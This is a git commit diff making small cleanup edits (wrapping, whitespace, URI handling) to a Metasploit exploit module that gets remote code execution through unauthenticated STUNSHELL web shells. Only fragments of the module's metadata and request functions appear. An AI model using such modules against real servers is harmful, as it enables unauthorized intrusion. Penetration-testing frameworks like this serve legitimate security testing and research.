cleanup for stunshell_exec

unstable
jvazquez-r7 2013-03-28 14:45:51 +01:00
parent a7a5569725
commit 9b18eb858b
1 changed files with 7 additions and 7 deletions

View File

@ -16,14 +16,14 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'STUNSHELL Web Shell Remote Code Execution',
'Description' => %q{
This module exploits unauthenticated versions of the "STUNSHELL" web shell. This
module works when safe mode is disabled on the web server. This shell is widely
used in automated RFI payloads.
This module exploits unauthenticated versions of the "STUNSHELL" web shell.
This module works when safe mode is disabled on the web server. This shell is
widely used in automated RFI payloads.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bwall <bwall[at]openbwall.com>', # vuln discovery & msf module
'bwall <bwall[at]openbwall.com>' # vuln discovery & msf module
],
'References' =>
[
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => ['unix', 'win'],
'Arch' => ARCH_CMD,
'Targets' =>
'Targets' =>
[
['stunshell / Unix', { 'Platform' => 'unix' } ],
['stunshell / Windows', { 'Platform' => 'win' } ]
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri = normalize_uri(target_uri.path.to_s)
request_parameters = {
'method' => 'POST',
'uri' => uri,
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def http_send_command(cmd)
uri = normalize_uri(datastore['URI'])
uri = normalize_uri(target_uri.path.to_s)
request_parameters = {
'method' => 'POST',
'uri' => uri,